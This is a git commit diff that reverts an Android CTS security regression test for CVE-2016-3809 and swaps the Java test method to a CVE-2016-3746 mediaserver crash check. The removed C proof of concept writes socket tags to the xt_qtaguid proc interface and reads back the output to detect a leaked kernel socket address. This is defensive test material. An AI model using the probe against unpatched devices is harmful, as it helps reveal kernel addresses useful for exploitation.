Revert "CTS test for Android Security b/72507125 b/27532522"
This reverts commit 71255c910b91a0fc24170143317162cf0f2d1223.
Bug: 72507125
Bug: 116174409
Test: Test no longer runs in CTS
Change-Id: I62e8d62f73f591472a9c61ed63f4a693a06b6d8f
(cherry picked from commit 73a6b0ddf4f62b508d5c7228fdc008364d4a3260)
(cherry picked from commit 13f35e09f696047eb744769182b310527971587a)
(cherry picked from commit 6f2821b5cb2ce954ad1d5180d09363f639c27e8e)
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 8d68507..dcad6fc 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -57,7 +57,6 @@
<!--__________________-->
<!-- Bulletin 2016-07 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
- <option name="push" value="CVE-2016-3809->/data/local/tmp/CVE-2016-3809" />
<option name="push" value="CVE-2016-3818->/data/local/tmp/CVE-2016-3818" />
<!-- Bulletin 2016-09 -->
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-3809/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-3809/Android.mk
deleted file mode 100644
index 615d39b..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-3809/Android.mk
+++ /dev/null
@@ -1,34 +0,0 @@
-# Copyright (C) 2018 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-3809
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts sts
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_SHARED_LIBRARIES := liblog
-
-LOCAL_CFLAGS += -Wall -Werror
-LOCAL_CFLAGS += -Iinclude -fPIE
-LOCAL_LDFLAGS += -fPIE -pie
-LOCAL_LDFLAGS += -rdynamic
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-3809/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-3809/poc.c
deleted file mode 100644
index 4f4805f..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-3809/poc.c
+++ /dev/null
@@ -1,92 +0,0 @@
-/**
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#define _GNU_SOURCE
-
-#include <cutils/log.h>
-#include <fcntl.h>
-#include <stdio.h>
-#include <string.h>
-#include <sys/socket.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-#include <unistd.h>
-
-#define BUF_SIZE 2048
-
-int main() {
- int sfd, fd, ret;
- char buf[BUF_SIZE];
- char wbuf[BUF_SIZE];
-
- ret = -1;
- sfd = socket(AF_INET, SOCK_DGRAM, 0);
- if (sfd == -1) {
- perror("socket create");
- return 0;
- }
- snprintf(buf, BUF_SIZE, "/proc/self/net/xt_qtaguid/ctrl");
- fd = open(buf, O_RDWR);
- if (fd == -1) {
- perror("canot open xt_qtaguid ctrl");
- close(sfd);
- return 0;
- }
-
- /* clean all tags */
- snprintf(wbuf, BUF_SIZE - 2, "d %d %u", 0, getuid());
- ret = write(fd, wbuf, strlen(wbuf));
- if (ret < 0) {
- perror("first clean");
- goto err;
- }
-
- unsigned long long tag = ((unsigned long long)0x13371) << 32;
- /* add sock tag */
- snprintf(wbuf, BUF_SIZE - 2, "t %d %llu %u", sfd, tag, getuid());
- ret = write(fd, wbuf, strlen(wbuf));
- if (ret < 0) {
- perror("add sock tag");
- goto err;
- }
-
- ret = read(fd, buf, 22);
- if (ret < 10) {
- perror("canot read or read error");
- goto err;
- }
- buf[21] = '\0';
- char *temp = buf + 5;
- printf("sock addr: 0x%s length=%d \n", temp, (int)strlen(temp));
- short address = (short)*temp;
- printf("addres sis %d", address);
- if (address != 48) // ascii value of 0 is 48
- ALOGE("CVE-2016-3809 test case failed");
- else
- ALOGE("CVE-2016-3809 test case passed");
-
- /* clean all tags again */
- snprintf(wbuf, BUF_SIZE - 2, "d %d %u", 0, getuid());
- ret = write(fd, wbuf, strlen(wbuf));
- if (ret < 0) {
- perror("cannot clean all tags at last time");
- goto err;
- }
-
-err:
- close(sfd);
- close(fd);
- return 0;
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
index e11c523..1e33083 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
@@ -28,13 +28,14 @@
}
/**
- * b/27532522
+ * b/27890802
*/
@SecurityTest(minPatchLevel = "2016-07")
- public void testPocCVE_2016_3809() throws Exception {
- AdbUtils.runCommandLine("logcat -c", getDevice());
- AdbUtils.runPoc("CVE-2016-3809", getDevice(), 60);
+ public void testPocCVE_2016_3746() throws Exception {
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runPoc("CVE-2016-3746", getDevice(), 60);
String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*CVE-2016-3809 test case failed[\\s\\n\\S]*", logcat);
+ assertNotMatchesMultiLine("Fatal signal[\\s\\S]*>>> /system/bin/mediaserver <<<",
+ logcat);
}
}